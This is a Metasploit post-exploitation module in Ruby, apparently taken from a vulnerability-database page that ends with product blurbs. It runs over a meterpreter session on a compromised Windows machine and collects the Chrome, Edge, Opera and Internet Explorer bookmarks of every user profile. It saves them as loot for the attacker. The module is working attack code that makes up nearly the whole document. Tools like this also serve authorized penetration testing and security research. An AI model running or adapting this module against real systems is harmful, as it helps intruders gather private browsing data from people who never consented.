class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Windows::UserProfiles
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Bookmarked Sites Retriever',
'Description' => %q{
This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge.
},
'License' => MSF_LICENSE,
'Author' => [ 'jerrelgordon'],
'Platform' => [ 'win' ],
'SessionTypes' => ['meterpreter'],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [ ],
'SideEffects' => []
}
)
)
end
def run
get_bookmarks('GoogleChrome') # gets bookmarks for google chrome
get_bookmarks('Opera') # gets bookmarks for opera
get_bookmarks('Edge') # gets bookmarks for edge
get_bookmarks('IE') # gets bookmarks for internet explorer
end
def get_bookmarks(browser)
file_exists = false # initializes file as not found
grab_user_profiles.each do |user| # parses information for all users on target machine into a list.
# If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
if (browser == 'GoogleChrome')
next unless user['LocalAppData']
bookmark_path = "#{user['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Bookmarks" # sets path for Google Chrome Bookmarks
elsif (browser == 'Edge')
next unless user['LocalAppData']
bookmark_path = "#{user['LocalAppData']}\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" # sets path for Microsoft Edge Bookmarks
elsif (browser == 'Opera')
next unless user['AppData']
bookmark_path = "#{user['AppData']}\\Opera Software\\Opera Stable\\Bookmarks" # sets path for Opera Bookmarks
elsif (browser == 'IE')
next unless user['Favorites']
bookmark_path = (user['Favorites']).to_s # sets path for IE Bookmarks Folder
count = 1
dir(bookmark_path).each do |file| # IE bookmarks stored individually as files so loots each one
next if ['.', '..'].include?(file)
file_exists = true
print_status("BOOKMARKS FOR #{user['ProfileDir']}")
path2 = "#{bookmark_path}\\#{file}"
file_contents = read_file(path2)
stored_bookmarks = store_loot(
"#{browser}.bookmarks",
'text/plain',
session,
file_contents,
"#{session}_#{count}_#{browser}_bookmarks.txt",
"Bookmarks for #{browser}"
)
print_status("Bookmarks stored: #{stored_bookmarks}")
count += 1
end
end
next unless file?(bookmark_path) # if file exists it is set to found, then all the bookmarks are outputted to standard output (the shell)
file_exists = true
print_status("BOOKMARKS FOR #{user['ProfileDir']}")
file = read_file(bookmark_path)
stored_bookmarks = store_loot(
"#{browser}.bookmarks",
'text/plain',
session,
file,
"#{session}_#{browser}_bookmarks.txt",
"Bookmarks for #{browser}"
)
print_status("Bookmarks stored: #{stored_bookmarks}")
end
if (file_exists == false) # if file was not found, prints no file found.
print_status("No Bookmarks found for #{browser}")
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation